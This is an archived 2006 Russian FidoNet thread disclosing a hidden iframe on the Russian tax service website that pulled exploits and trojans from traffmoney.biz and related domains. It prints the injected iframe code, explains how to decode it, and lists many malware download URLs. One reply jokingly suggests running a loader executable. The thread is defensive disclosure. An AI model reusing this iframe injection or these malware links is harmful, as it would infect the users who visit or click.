|
|
ru.internet.security- RU.INTERNET.SECURITY --------------------------------------------------------- From : Marхnais 2:5020/2173.2 12 Apr 2006 01:56:35 To : All Subject : Трояны на сайте налоговой службы -------------------------------------------------------------------------------- * Copied to: PVT.MARINAIS, SU.CM, SU.VIRUS ъ Прокомментируйте, пожалуйста. =============================================================================== From : Alexey Podtoptalow 04-Mar-06 03:53:19 2:5020/400 To : All Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит закладка. Выглядит так: ========================================================= </head> <body bgcolor="#E8EDF0" topmargin="0" leftmargin="0" link="#1B4765" ... <iframe src="http://tr ... ... ========================================================= Что расшифровывается браузером как: <iframe src="hxxp://traffmoney.biz/dl/adv648.php" width=1 height=1></iframe> Троянский сайт traffmoney.biz в данный момент не действует, недавно его трояны грузили (при открытии такого сайта в IE) вот это: DrWeb Exploit.MS05-053 hxxp://traffmoney.biz/dl/xpladv700.wmf DrWeb Trojan.DownLoader.6971 hxxp://traffmoney.biz/dl/loaderadv698.exe DrWeb Trojan.Spambot hxxp://traffmoney.biz/progs/tool1.txt DrWeb Trojan.Fakealert hxxp://traffmoney.biz/progs/tool2.txt DrWeb Trojan.DownLoader.7030 hxxp://traffmoney.biz/progs/tool3.txt DrWeb Trojan.DownLoader.6990 hxxp://traffmoney.biz/progs/tool4.txt hxxp://traffmoney.biz/progs/tool5.txt DrWeb Trojan.DownLoader.6886 hxxp://traffmoney.biz/progs/toolbar.txt DrWeb Adware.Dh hxxp://194.187.45.55/DR21206.exe DrWeb Trojan.MulDrop.3049 hxxp://194.187.45.55/installerwebnex.exe DrWeb Adware.DollarRevenue hxxp://content.dollarrevenue.com/gimmygames11.exe DrWeb Trojan.Popuper hxxp://content.dollarrevenue.com/winsysban11.exe DrWeb Trojan.DownLoader.6969 hxxp://content.dollarrevenue.com/winsysupd11.exe DrWeb Adware.DollarRevenue hxxp://promo.dollarrevenue.com/bundle/drsmartload.exe hxxp://traffmoney.biz/progs/hosts.txt DrWeb Trojan.MulDrop.3313 hxxp://traffmoney.biz/progs/kl.txt DrWeb Trojan.DownLoader.7045 hxxp://traffmoney.biz/progs/ms1.txt DrWeb Trojan.StartPage.1224 hxxp://traffmoney.biz/progs/paytime.txt ЗЫ: Вот и верь после этого людям (с) =============================================================================== From : Alexey Podtoptalow 04-Mar-06 11:15:56 2:5020/400 To : All Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> AP> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP> закладка. AP> Выглядит так: AP> ========================================================= AP> </head>> AP> <body bgcolor="#E8EDF0" topmargin="0" leftmargin="0" link="#1B4765" ... AP> <iframe src="http://tr ... AP> ... AP> ========================================================= AP> Что расшифровывается браузером как: AP> <iframe src="hxxp://traffmoney.biz/dl/adv648.php" width=1 AP> height=1></iframe> AP> Троянский сайт traffmoney.biz в данный момент не действует, недавно его AP> трояны грузили (при открытии такого сайта в IE) вот это: Сорри, все прекрасно работает. Видимо, временные проблемы были ночью. И софт чуток подновили, сейчас уже так: DrWeb Exploit.MS05-053 http://traffmoney.biz/dl/xpladv600.wmf DrWeb Trojan.DownLoader.6971 http://traffmoney.biz/dl/loadadv600.exe DrWeb Trojan.DownLoader.6971 Exploit.CodeBase http://traffmoney.biz/dl/adv600/x.chm http://traffmoney.biz/progs/hosts.txt NOD32v2 variant of Win32/TrojanDropper.Small.NDG http://traffmoney.biz/progs/kl.txt DrWeb Trojan.DownLoader.7045 http://traffmoney.biz/progs/ms1.txt DrWeb Trojan.StartPage.1224 http://traffmoney.biz/progs/paytime.txt DrWeb Trojan.Spambot http://traffmoney.biz/progs/tool1.txt DrWeb Trojan.Fakealert http://traffmoney.biz/progs/tool2.txt DrWeb Trojan.PWS.Tan http://traffmoney.biz/progs/tool3.txt DrWeb BackDoor.Haxdoor.208 http://traffmoney.biz/progs/tool4.txt http://traffmoney.biz/progs/tool5.txt DrWeb Trojan.DownLoader.6996 http://traffmoney.biz/progs/toolbar.txt Остальные, как и было: DrWeb Adware.Dh hxxp://194.187.45.55/DR21206.exe DrWeb Trojan.MulDrop.3049 hxxp://194.187.45.55/installerwebnex.exe DrWeb Adware.DollarRevenue hxxp://content.dollarrevenue.com/gimmygames11.exe DrWeb Trojan.Popuper hxxp://content.dollarrevenue.com/winsysban11.exe DrWeb Trojan.DownLoader.6969 hxxp://content.dollarrevenue.com/winsysupd11.exe DrWeb Adware.DollarRevenue hxxp://promo.dollarrevenue.com/bundle/drsmartload.exe =============================================================================== From : Dima Abramow 04-Mar-06 13:07:16 2:5022/27.1 To : Alexey Podtoptalow Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= AP> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP> закладка. Выглядит так: Где именно? Прямо на заглавной странице? Сколь можно судить по твоей цитате, ДрВеб все это легко определяет - каким образом мои инспектора умудрились этого не ощутить на себе Я на этом сайте бываю крайне редко, незачем - но изредка, все-таки, заглавную страничку дергаю. Простым своим IE, так и не полюбил я ни Оперу, не прочие альтернативы. И - ничего.. =============================================================================== From : Alexey Podtoptalow 04-Mar-06 14:04:24 2:5020/400 To : Dima Abramow 2:5022/27 Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> AP>> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP>> закладка. Выглядит так: DA> Где именно? Прямо на заглавной странице? Угу. И еще на всех, что я просмотрел - на их налоговых анекдотах точно. Глянь сам, оно же вполне доступно. DA> Сколь можно судить по твоей цитате, ДрВеб все это легко определяет - DA> каким образом мои инспектора умудрились этого не ощутить на себе? Я на DA> этом сайте бываю крайне редко, незачем - но изредка, все-таки, заглавную DA> страничку дергаю. Простым своим IE, так и не полюбил я ни Оперу, не DA> прочие альтернативы. И - ничего... Вечно вам не везет. То мешки кончились, то дерьмо не завезли :) (с). В России же живем. Веб-мастер в этой вот конторе не успевает за переездами троянских сайтов: Разработка и поддержка сайта: href=http://www.gnivc.ru ФГУП ГHИВЦ ФHС России =============================================================================== From : Alexey Haritonov 04-Mar-06 19:09:07 2:5015/222 To : Alexey Podtoptalow Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= AP> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP> закладка. Выглядит так: AP> Что расшифровывается браузером как: [...skipped...] AP> ЗЫ: Вот и верь после этого людям (с) а кто ее там прописал? неужели сама налоговая? что-то с трудом верится... =============================================================================== From : Ilja Shushin 04-Mar-06 21:17:28 2:5020/400 To : Alexey Podtoptalow Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: Ilja Shushin <gales@bk.ru> AP>> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP>> закладка. Простите, а как Вы ищете эти закладки? Просто сканируете сеть? Вряд ли, на модеме-то (у Вас помнится был модем). Как эту заразу вычисляете? Можете поделиться опытом или советами Хочется тоже свой вклад в борьбу с вирусами внести :) =============================================================================== From : Alexey Podtoptalow 05-Mar-06 11:49:50 2:5020/400 To : Ilja Shushin Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> IS> Простите, а как Вы ищете эти закладки? Просто сканируете сеть? Вряд ли, IS> на модеме-то (у Вас помнится был модем). Hет, конечно, сканировать вообще можно только отдельные компьютеры. И для поиска источников заразы это вряд ли что вообще может дать. Это скорее для последующего взлома пригодно, чем для поиска заразы. Есть модем, скоро будет ADSL модем, но это не очень важно, было бы желание, а разницы тут не очень много. В смысле большая скорость для поиска и не нужна. Для проверки больших файлов (John, спасибо!) есть http://online.drweb.com/?url=1 IS> Как эту заразу вычисляете? IS> Можете поделиться опытом или советами? Хочется тоже свой вклад в борьбу с IS> вирусами внести :) Да с миру по нитке в основном. Оно и набирается понемногу. В порядке убывания результативности: - Проверка имеющихся ссылок на предмет изменения. Для экономии траффика - по заголовкам "Last-Modified:" "Content-Length:" из запросов HEAD. wget с ключиком --spider такое умеет, да и не только он - это, имхо, умеют и другие менеджеры закачек. - Скачивание и запуск заразы с записью лога их обмена сниффером (Ethereal). - Анализ логов прокси. Пригодны лишь логи с полными ссылками, конечно. Вот логи эти уже большие - тут с модемом здорово не повеселишься :). Разве что изредка, часто не проверишь. - Обмен найденным с народом (иногда взаимный, в смысле в ответ тоже что-то присылают. - Просмотр, проверка (лучше скачивание и автоматический анализ на предмет новых) выкладываемых ссылок на сайте японца gunkan maki http://gunkanmaki.jog.buttobi.net/. Было когда-то кое-что и у вебхелпера (www.webhelper4u.com), сейчас нет. Изредка что-то бывает тут: http://www.kephyr.com/spywarescanner/pus-practices/ - Поиск в гугле - когда-то шикарные результаты выдавал поиск ms-its-mhtml-file "O16 DPF " +chm, сейчас уже мало, chm уязвимость не так популярна. - Просмотр форумов, рассылок, проверка ссылок, которые упоминает там народ. Hу, и последнее - искать сайты, где стоят собственно закладки, дело неблагодарное. Их слишком много, да и троянов на них нет. Интереснее как раз те, где зараза лежит и раздается. А жадных до денег веб-мастеров, за копейки размещающих у себя на сайтах чужие закладки, повторюсь, много. Этих моральных уродов и искать-то противно. =============================================================================== From : Alexey Podtoptalow 05-Mar-06 14:21:05 2:5020/400 To : Dima Abramow 2:5022/27 Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> AP>> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP>> закладка. Выглядит так: DA> Где именно? Прямо на заглавной странице? DA> Сколь можно судить по твоей цитате, ДрВеб все это легко определяет - DA> каким образом мои инспектора умудрились этого не ощутить на себе? Я на DA> этом сайте бываю крайне редко, незачем - но изредка, все-таки, заглавную DA> страничку дергаю. Простым своим IE, так и не полюбил я ни Оперу, не DA> прочие альтернативы. И - ничего... Проверил - ты прав. То, что на www.nalog.ru размещена стандартная закладка, точно. А как именно она работает, кому что выдается - я не знаю. Hа этих У этих троянописателей не только эта ссылка просто так сдуру не срабатывает, но и остальные тоже. Хотя зараза и лежит, никуда она не делась, и даже обновляется, но не всем раздается. Может, по стране обращения фильтруют или еще как, не знаю. Я-то их софт проверяю запуском уже загрузчика, потому и получаю полный комплект. А с их хитростями заморачиваться - оно мне не надо, пусть разбираются, кто пограмотнее в веб-штучках. Сайт traffmoney.biz не один. Это с полгода-год назад у них все было в одной корзине - vxiframe.biz. Когда этих деятелей стали гонять (я тут как-то писал о них), стали раскладывать свое добро по 50 штук на разные сайты и время от времени переезжают. Сейчас действуют: http://traffweb.biz/dl/loadadv750.exe ... http://traffweb.biz/dl/loadadv799.exe (эти дрвеб в данный момент не детектит, отправил, сегодня добавят, имхо) Остальные детектятся: DrWeb Trojan.DownLoader.6986 http://traffbest.biz/dl/loadadv400.exe ... loadadv449.exe DrWeb Trojan.DownLoader.6971 http://traffbucks.biz/dl/loadadv450.exe ... loadadv499.exe DrWeb Trojan.DownLoader.6986 http://traffcool.biz/dl/loadadv500.exe ... loadadv549.exe DrWeb Trojan.DownLoader.6984 http://traffdollars.biz/dl/loadadv550.exe ... loadadv599.exe DrWeb Trojan.DownLoader.6971 http://traffmoney.biz/dl/loadadv600.exe ... loadadv649.exe DrWeb Trojan.DownLoader.6965 http://traffnew.biz/dl/loadadv650.exe ... loadadv699.exe DrWeb Trojan.DownLoader.6971 http://traffsale1.biz/dl/loadadv700.exe ... loadadv749.exe Для инициации загрузок там по каждому номеру из вышеперечисленных 400..749 лежит комплект эксплоитов - от древних java и chm до новейших wmf, fillmem и т.п., всего штук по десять - двенадцать. Какой-то один из кучи сработает на любой системе. Цель всех этих эксплоитов - загрузка и запуск вышеперечисленного загрузчика (loadadvNNN.exe, того же по номеру, что и advNNN.php). И уж он-то притащит по цепочке, установит и запустит все, что я перечислял в предыдущих письмах. Оно, похоже, как-то хитро фильтруется, эксплойты и загрузчик кому попало при обращении по этой ссылке не выдаются - при попытке контрольной загрузки то редиректят на http://traffweb.biz/dl/error.php, то на teen-stop.. Хотя и загрузчики и трояны лежат на месте и благополучно обновляются. ЗЫ: Результат для стандартного комплекта загрузок невозможно не увидеть - реклама антишпионского софта во весь экран, блокировка диспетчера задач, невозможность что-то запустить для убиения этого счастья (кроме как в безопасном режиме) + активная рассылка спама. Сразу же после загрузки. =============================================================================== From : Dima Abramow 05-Mar-06 15:44:17 2:5022/27.1 To : Alexey Podtoptalow Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= AP>>> Hа сайте Федеральной налоговой службы России - www.nalog.ru - стоит AP>>> закладка... DA>> Где именно? Прямо на заглавной странице? AP> Угу. И еще на всех, что я просмотрел - на их налоговых анекдотах точно. AP> Глянь сам, оно же вполне доступно. ... AP> Вечно вам не везет. То мешки кончились, то дерьмо не завезли :) (с). В AP> России же живем. Веб-мастер в этой вот конторе не успевает за переездами AP> троянских сайтов: Разработка и поддержка сайта: href=http://www.gnivc.ru AP> ФГУП ГHИВЦ ФHС России Hу, от этих-то, последних, можно еще и не такого ожидать... :-) Hо - да, не везет. По-крупной. Зашел на сайт родимой головной конторы, топтался, сколько хватило моего и моего модема терпения по страничкам, долго потом терзал машину ДрВебом - ничего.. Что и как конкретно я должен совершить, чтобы с www.nalog.ru на меня ринулись стаи злобных троянов?. =============================================================================== From : Alexey Podtoptalow 05-Mar-06 16:24:08 2:5020/400 To : Dima Abramow 2:5022/27 Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> DA> Зашел на сайт родимой головной конторы, топтался, сколько хватило моего и DA> моего модема терпения по страничкам, долго потом терзал машину ДрВебом - DA> ничего... DA> Что и как конкретно я должен совершить, чтобы с www.nalog.ru на меня DA> ринулись стаи злобных троянов?.. Дима, я не знаю тонких подробностей работы троянских закладок. Hе настолько я спец в этих делах. Я ищу заразу, а не способы ее впаривания - на то есть другие люди. Hо я знаю точно, что это - закладка (скачал главную страницу и посмотрел ее код). А именно - от iframe до /iframe. (И оно там много где, включая свежие новости, что даже меня, далекого от веб-программирования, наводит на мысль о том, что закладка размещена именно веб-мастером, а не взломщиком) : http://www.nalog.ru =========================================================================== <title> www.nalog.ru </title> <link rel="stylesheet" type="text/css" href="site.css"> </head> <body bgcolor="#E8EDF0" topmargin="0" leftmargin="0" link="#1B4765" vlink="#366E94"> <iframe src="http://traffm oney.biz/dl/ad v648.php" width=1 height=1></iframe> ============================================================================ и вот это тоже: http://www.nalog.ru/document.php?id=21827&topic=root_nalog ============================================================================ <title>О признании в нелегальном обороте в случае появления на алкогольном рынке алкогольной продукции</title> <link rel="stylesheet" type="text/css" href="site.css"> <link rel="alternate" type="application/rss+xml" title="www.nalog.ru - Hовости сайта" href="http://www.nalog.ru/news.xml"> </head> <body bgcolor="#E8EDF0" topmargin="0" leftmargin="0" link="#1B4765" vlink="#366E94"> <iframe src="http://traffm oney.biz/dl/ad v648.php" width=1 height=1></iframe> ============================================================================ и вот это: http://www.nalog.ru/document.php?id=21807&topic=root_nalog ============================================================================ <title>Анонс журнала <Российский налоговый курьер> 2006,</title> <link rel="stylesheet" type="text/css" href="site.css"> <link rel="alternate" type="application/rss+xml" title="www.nalog.ru - Hовости сайта" href="http://www.nalog.ru/news.xml"> </head> <body bgcolor="#E8EDF0" topmargin="0" leftmargin="0" link="#1B4765" vlink="#366E94"> <iframe src="http://traffm oney.biz/dl/ad v648.php" width=1 height=1></iframe> ============================================================================ ЗЫ: Видать, и у вас платят мало. Приходится вот так подрабатывать. Хотя за такое гнать надо. По крайней мере из государственных контор такого масштаба. ЗЗЫ: Этот айфрейм вручную декодируется так: - Открываешь текстовый редактор, можно notepad. - Жмешь Alt и на малой цифровой клавиатуре поочередно двух/трехзначные цифры, приведенные выше. После ввода цифры отпускаешь Alt и получаешь знак, который эта цифирь значит для браузера. Получишь вот это: http://traffmoney.biz/dl/adv648.php Если действительно хочешь посмотреть, что оно должно тянуть - просто запусти вот это: hxxp://toolbarmoney.biz/dl/loaderadv648.exe Получишь полный комплект. Скучно не будет, гарантирую :). =============================================================================== From : Alexey Podtoptalow 07-Mar-06 15:54:30 2:5020/400 To : All Subj : Закладка на официальном сайте ФHС России =================================================================ADINF.SUPPORT= From: "Alexey Podtoptalow" <nick@pues.podolsk.ru> AP> Hо я знаю точно, что это - закладка (скачал главную страницу и посмотрел AP> ее код). А именно - от iframe до /iframe. AP> <iframe AP> src="http://traff AP> m AP> oney.biz/dl/a AP> d v648.php" width=1 AP> height=1></iframe> AP> ========================================================================= Сейчас проверил - нету, убрали. Всего-то за 4 дня от момента создания рекламы сайту ФHС. ЗЫ: Это было круто. Ладно еще закладки на порнухе, кряках и т.п., к этому вроде как уже и привыкли. Да и то там чаще все поскромнее - скажем, чуть ли не интеллигентные (по сравнению) Adware.Winad, Trojan.Isbar. А тут полный джентльменский набор - с крутейшей тырилкой паролей, банковских и личных данных, такого же класса Backdoor.Haxdoor.208, Spambot да еще до кучи мерзопакостный Adware.Look2Me - это было впечатляюще. =============================================================================== ... А меж тем, в правилах есть что-то интересное... ;-) Phaino 4.0 _BD-L+=1P-S-TU-x* b011279 PC9353 netBFQ-Wp- Int4 com2 msg2$< ech3 osD$W>L Eg1 pub4 USA2 god1 (c)1 hak45+ xsc4 UFO4=1< PsyINTP/INTJm mus01 TV2 gam01 hum2 lab25355 lib11-44 edu45 lng3>eo=1< co1< arg4< petacqr; * Origin: 2:5020/1317.8, /2024.2, /2173.2, /2613.5, /5413.3 (2:5020/2173.2) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.internet.security/38839769b12f.html, оценка из 5, голосов 10
|